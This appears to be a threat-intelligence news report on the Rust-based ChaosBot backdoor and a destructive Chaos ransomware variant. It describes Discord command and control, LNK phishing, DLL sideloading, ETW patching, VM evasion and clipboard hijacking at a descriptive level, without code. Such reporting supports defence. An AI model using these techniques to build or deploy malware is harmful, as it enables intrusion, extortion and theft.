A new backdoor, dubbed ChaosBot, has been discovered by cybersecurity researchers. The malware, which is written in the Rust programming language, allows attackers to take control of a compromised host to conduct reconnaissance and execute arbitrary commands. The eSentire cybersecurity firm first detected ChaosBot in late September 2025 within the environment of a financial services client. Attackers gained initial access by using stolen credentials for both a Cisco VPN and a privileged Active Directory account. They then used Windows Management Instrumentation (WMI) to remotely execute commands and deploy the ChaosBot malware across the network.
The malware stands out for its unique use of Discord as a command-and-control (C2) channel. Its name comes from a Discord profile used by the primary threat actor, who goes by the name “chaos_00019.” This individual issues remote commands to infected devices through Discord, with another user account, “lovebb0024,” also associated with C2 operations. The malware’s primary function is to interact with a specific Discord channel, created with the victim’s computer name, to receive instructions. It supports several commands, including “shell” for executing PowerShell commands, “scr” for taking screenshots, “download” for downloading files to the victim, and “upload” for uploading files to the Discord channel.
In addition to the initial access method, ChaosBot has also been observed spreading through phishing emails. These emails contain a malicious Windows shortcut (.LNK) file. If a recipient opens the file, it executes a PowerShell command to download and run ChaosBot. As a distraction, the malware simultaneously displays a decoy PDF file that appears to be from the State Bank of Vietnam. The malicious payload is a DLL file named “msedge_elf.dll,” which is sideloaded using a legitimate Microsoft Edge binary. After this, it conducts system reconnaissance and downloads a fast reverse proxy (FRP) to create a reverse proxy into the network, ensuring persistent access.
Researchers also noted the attackers attempted to configure a Visual Studio Code Tunnel service as an additional backdoor for command execution, but this effort was unsuccessful. The malware also includes evasion techniques to bypass Event Tracing for Windows (ETW) and virtual machine (VM) detection. It achieves this by patching the ntdll!EtwEventWrite function and by checking for MAC addresses commonly used by VMware and VirtualBox. If it detects a VM environment, the malware will simply exit, preventing analysis.
In a separate report, Fortinet FortiGuard Labs detailed a new, more destructive variant of Chaos Ransomware, written in C++. This variant introduces two new capabilities: destructive encryption and clipboard hijacking. Unlike traditional ransomware that only encrypts files, this version can irrevocably delete large files (over 1.3 GB) rather than encrypting them. Furthermore, it manipulates clipboard content by replacing copied Bitcoin addresses with an attacker-controlled wallet address to redirect cryptocurrency transfers. This dual-pronged approach of destructive extortion and financial fraud makes the new Chaos variant a more aggressive and multifaceted threat.
The new Chaos-C++ ransomware is typically distributed by posing as bogus utilities like “System Optimizer v2.1” to trick users into installing it. Previous versions of Chaos ransomware have been distributed under the guise of fake applications like OpenAI ChatGPT and InVideo AI. Once launched, the malware first checks for a specific file to determine if it has already been executed on the machine. If not, it checks for administrative privileges and then runs a series of commands to inhibit system recovery. The ransomware then begins its encryption process, fully encrypting files under 50 MB, while skipping those between 50 MB and 1.3 GB. The ransomware uses a combination of symmetric or asymmetric encryption and a fallback XOR routine, making its execution more robust and difficult to disrupt.
Reference:
